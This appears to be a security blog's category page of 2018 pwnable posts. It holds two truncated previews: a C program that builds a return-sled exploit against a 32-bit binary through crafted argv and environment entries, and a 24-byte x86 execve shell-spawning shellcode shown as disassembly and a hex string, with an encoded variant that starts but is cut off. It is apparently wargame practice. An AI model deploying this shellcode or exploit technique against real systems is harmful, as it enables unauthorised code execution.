HACK/PWNABLE
-
Retsled + FindenvHACK/PWNABLE 2018. 7. 17. 21:39
RET Sleding + Find Enviroment #include int main() { char *environ[] = { "E1", "E2", "E3", "E4", "E5", "E6", "E7", "E8", "E9", "E10", "E11", "E12", "E12", "E13", "E14", "E15", "E16", "E17", "E18", "E19", "E20", "E21", "E22", "E23", "E24", "E25", "E26", "E27", "E28", "E29", "E30", 0}; // ret- 0x0804848f // add esp,0x114- 0x08048484 char *argv[] = {"hack","\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x..
-
24Byte ShellcodeHACK/PWNABLE 2018. 6. 25. 11:15
31C0XOR EAX,EAX 50PUSH EAX 68 2F2F7368PUSH 68732F2F 68 2F62696EPUSH 6E69622F 89E3MOV EBX,ESP 50PUSH EAX 53PUSH EBX 89E1MOV ECX,ESP 99CDQ B0 0BMOV AL,0B CD 80INT 80 \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80 Shellcode without %2f\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30..